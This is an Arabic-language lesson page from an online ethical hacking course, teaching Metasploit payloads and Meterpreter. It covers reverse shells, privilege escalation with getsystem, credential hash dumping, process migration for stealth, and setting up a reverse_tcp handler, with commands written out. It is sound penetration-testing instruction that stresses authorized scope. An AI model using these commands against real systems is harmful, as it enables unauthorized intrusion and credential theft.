0Pricing
Ethical Hacking Academy · درس

الحمولات وMeterpreter

صدفة ما بعد الاستغلال

الحمولات وMeterpreter درس مجاني في Ethical Hacking Academy على CoddyKit. هذا هو الدرس 3 من أصل 4. يمكنك قراءة الدرس كاملاً أدناه مجاناً — ثم تمرن عليه مباشرة في المتصفح باستخدام محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7. هذا الدرس جزء من مسار التعلم في Ethical Hacking Academy، وتقدمك يتزامن عبر الويب وتطبيق CoddyKit. تتضمن دورة Ethical Hacking Academy 4 دروس في المجموع.

ما المقصود بالحمولة؟

الحمولة هي الشيفرة التي تُنفَّذ على الهدف بعد نجاح عملية الاستغلال. وهي تحدد ما يمكنك فعله لاحقًا، بدءًا من تشغيل أمر واحد ووصولًا إلى فتح قشرة تفاعلية كاملة.

يعتمد اختيار الحمولة المناسبة على نظام تشغيل الهدف وإعدادات الشبكة ومقدار الوصول الذي تحتاج إليه.

الحمولات المرحلية وغير المرحلية

تأتي الحمولات بأسلوبي تسليم:

  • Staged (لاحظ الرمز / في meterpreter/reverse_tcp): يرسل أولًا جزءًا صغيرًا، ثم ينزّل الحمولة الكاملة. ويكون الأثر الأولي أصغر.
  • Stageless (لاحظ الرمز _ في meterpreter_reverse_tcp): تُسلَّم الحمولة كاملةً دفعة واحدة. وتكون أكثر موثوقية على الشبكات غير المستقرة.

القشرة المرتبطة مقابل القشرة العكسية

يوجد اتجاهان للاتصال:

  • Bind shell: يفتح الهدف منفذًا وينتظر، ثم تتصل به. وغالبًا ما تحظرها جدران الحماية.
  • Reverse shell: يتصل الهدف عائدًا بك (LHOST/LPORT). وعادةً ما تتجاوز هذه الطريقة جدران الحماية التي تسمح بالاتصالات الصادرة.

ولهذا السبب تكون الحمولات العكسية هي الخيار الافتراضي الشائع.

التعرّف على Meterpreter

Meterpreter حمولة متقدمة من Metasploit. وعلى خلاف قشرة الأوامر الأساسية، تعمل في الذاكرة وتتواصل عبر قناة مشفّرة، وتوفر مجموعة أوامر غنية لما بعد الاستغلال.

ولأنها تتجنب الكتابة على القرص، فهي أكثر تخفيًا من إسقاط ملف تنفيذي منفصل.

أوامر Meterpreter الأساسية

بعد الحصول على جلسة Meterpreter، تساعدك الأوامر الأساسية على فهم الهدف وتحديد وضعك عليه.

sysinfo      # OS, architecture, hostname
getuid       # current user context
ps           # running processes
pwd  ls  cd  # filesystem navigation

نقل الملفات

ينقل Meterpreter الملفات بين جهازك والهدف باستخدام أوامر بسيطة، وهو أمر مفيد لجمع الأدلة أو تجهيز الأدوات في الاختبارات المصرّح بها.

download C:\\Users\\admin\\secret.txt /tmp/
upload /tmp/tool.exe C:\\Windows\\Temp\\

الانتقال إلى قشرة النظام

ينقلك الأمر shell من Meterpreter إلى مفسّر الأوامر الأصلي للهدف (cmd.exe أو /bin/sh) عندما تحتاج إلى تشغيل أوامر نظام التشغيل مباشرةً.

اكتب exit للعودة إلى سطر أوامر Meterpreter من دون فقدان الجلسة.

shell
# C:\> whoami
# exit  -> back to meterpreter

تصعيد الامتيازات

غالبًا ما تبدأ بامتيازات محدودة. يساعدك Meterpreter على تصعيدها:

  • يحاول getsystem استخدام تقنيات معروفة للحصول على امتياز SYSTEM في Windows.
  • تقترح وحدة ما بعد الاستغلال local_exploit_suggester عمليات استغلال محلية لتصعيد الامتيازات على المضيف.

تتيح الامتيازات الأعلى استخراج بيانات الاعتماد والوصول الأعمق.

getsystem
run post/multi/recon/local_exploit_suggester

ترحيل العمليات

تعيش جلستك داخل عملية. إذا كانت هذه العملية غير مستقرة أو يُرجَّح إنهاؤها، فاستخدم migrate للانتقال إلى عملية أكثر استقرارًا وطويلة التشغيل للحفاظ على الجلسة.

يساعد الترحيل إلى عملية تطابق مستوى امتيازاتك أيضًا على الاندماج، وقد يغيّر سياق المستخدم الخاص بك.

ps
migrate 1340     # migrate into a stable PID

الحفاظ على الوصول

يتضمن Meterpreter ميزات لالتقاط بيانات مفيدة أثناء التقييمات المصرّح بها، مثل hashdump لجمع تجزئات كلمات المرور وأدوات keyscan لإظهار أثر التقاط المدخلات.

استخدم هذه الإمكانات ضمن النطاق المتفق عليه فقط، ووثّق كل شيء في تقرير العميل.

hashdump
run post/windows/gather/checkvm

المعالجات

تحتاج الحمولة العكسية إلى جهة تستمع على جهازك لالتقاط الاتصال. وتؤدي وحدة multi/handler هذا الدور. اضبطها باستخدام الحمولة نفسها وLHOST وLPORT المستخدمة لإنشاء الحمولة.

يُعد ذلك ضروريًا عند تسليم حمولة msfvenom خارج وحدة التحكم: ابدأ المعالج أولًا، ثم شغّل الحمولة على الهدف.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 4444
exploit -j

تحقق سريع

اختر الحمولة التي تتجاوز جدار حماية مقيّدًا.

مراجعة

تعلمت الحمولات وMeterpreter:

  • يمكن أن تكون الحمولات staged (/) أو stageless (_)، وأن تكون bind أو reverse؛ وعادةً ما تتجاوز الحمولات العكسية جدران الحماية.
  • يعمل Meterpreter في الذاكرة عبر قناة مشفّرة، ويوفر أوامر غنية.
  • المهام الأساسية: sysinfo, getuid, ps, download/upload, shell.
  • صعّد الامتيازات باستخدام getsystem وlocal_exploit_suggester، واستخدم migrate لتحقيق الاستقرار.
  • استخدم ميزات جمع البيانات ضمن النطاق فقط، ووثّق كل شيء.

التالي: وحدات ما بعد الاستغلال، والتحرك عبر نقاط الارتكاز، وجمع البيانات.

الأسئلة الشائعة

هل درس «الحمولات وMeterpreter» مجاني؟

نعم — نص درس «الحمولات وMeterpreter» كامل متاح مجاناً هنا على الويب. لتمرينه بشكل تفاعلي (محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7) وفتح باقي دورة Ethical Hacking Academy، انتقل إلى CoddyKit PRO. تتضمن دورة Ethical Hacking Academy 4 دروس في المجموع.

ماذا ستتعلم في «الحمولات وMeterpreter»؟

صدفة ما بعد الاستغلال تتمرن على Ethical Hacking Academy مع أكواد عملية تشغلها مباشرة في المتصفح، ومدرس ذكاء اصطناعي متاح 24/7 يجيب على أسئلتك أثناء عملك.

هل أحتاج إلى خبرة سابقة لأبدأ Ethical Hacking Academy؟

لا تُشترط خبرة سابقة. Ethical Hacking Academy على CoddyKit منظم للمبتدئين حتى المتقدمين، لذا يمكنك البدء من هنا أو من البداية والتقدم بسرعتك الخاصة. هذا هو الدرس 3 من أصل 4.

كم من الوقت يستغرق درس «الحمولات وMeterpreter»؟

معظم دروس CoddyKit تستغرق حوالي 5–10 دقائق. كل منها موجز وتفاعلي، لذا تحرز تقدماً مستمراً وتستأنف من حيث توقفت عبر الويب والتطبيق.

هل يمكنني كتابة وتشغيل أكواد في درس Ethical Hacking Academy هذا؟

نعم. كل درس في Ethical Hacking Academy يتضمن محرر أكواد مدمج، لذا تكتب وتشغل أكواداً حقيقية مباشرة في متصفحك وتحصل على تعليقات فورية من الذكاء الاصطناعي — بدون إعداد محلي.

جميع الدروس في هذه الدورة

  1. بنية Metasploit
  2. البحث عن الثغرات واستغلالها
  3. الحمولات وMeterpreter
  4. وحدات ما بعد الاستغلال
← العودة إلى Ethical Hacking Academy